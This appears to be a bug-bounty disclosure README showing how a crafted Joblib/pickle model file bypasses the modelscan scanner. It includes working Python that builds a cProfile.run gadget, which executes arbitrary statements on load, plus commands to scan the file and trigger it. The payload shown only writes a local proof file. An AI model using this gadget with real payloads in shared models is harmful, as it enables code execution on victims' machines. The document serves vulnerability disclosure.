
ModelScan Bypass PoC – Joblib Format (cProfile.run)

Summary

This repository demonstrates a bypass of ProtectAI's modelscan scanner using the cProfile.run() technique in Joblib format.

Vulnerability

  • Scanner: modelscan v0.7.6 (latest as of 2026-04-06)
  • Format: Joblib (.joblib), listed as a premium format on the Huntr MFV bounty program
  • Technique: cProfile.run(stmt) internally calls exec(stmt), achieving full RCE
  • Blocklist gap: neither the cProfile module nor its run function appears in modelscan's unsafe_globals
  • Scan result: 0 issues found

Impact

An attacker can upload a malicious .joblib model file to any model registry. When a victim loads it with joblib.load() or pickle.load(), arbitrary code executes.
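A minimal sketch of how such a gadget can be built (using plain pickle so the example is self-contained; calling joblib.dump on the same object would produce an equivalent .joblib file). The statement here is a harmless stand-in; the repo's actual PoC writes /tmp/joblib_pwned.txt instead:

```python
import cProfile  # stdlib; cProfile.run() exec()s an arbitrary statement
import pickle


class MaliciousModel:
    """Pickle gadget: deserializing this object calls cProfile.run(stmt)."""

    def __reduce__(self):
        # Harmless stand-in for the payload statement
        stmt = "open('poc_executed.txt', 'w').write('arbitrary code ran')"
        return (cProfile.run, (stmt,))


blob = pickle.dumps(MaliciousModel())
pickle.loads(blob)  # statement executes during load (profiler stats also print)
```

Because the callable resolved at load time is cProfile.run rather than a blocklisted name like os.system or builtins.exec, a pure denylist scanner has nothing to match against.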

Reproduction

# Scan with modelscan – reports 0 issues
modelscan scan -p model.joblib

# Load to trigger RCE
python3 -c "import joblib; joblib.load('model.joblib')"
# Creates /tmp/joblib_pwned.txt with proof of execution

Technical Details

The pickle bytecode uses:

  1. STACK_GLOBAL to resolve cProfile.run
  2. REDUCE to call it with an arbitrary Python statement
  3. cProfile.run() internally passes the statement to exec(), executing arbitrary code

This is the same technique as the pickle bypass but targeting the Joblib format specifically, which is listed as a separate premium format on the Huntr MFV bounty program.
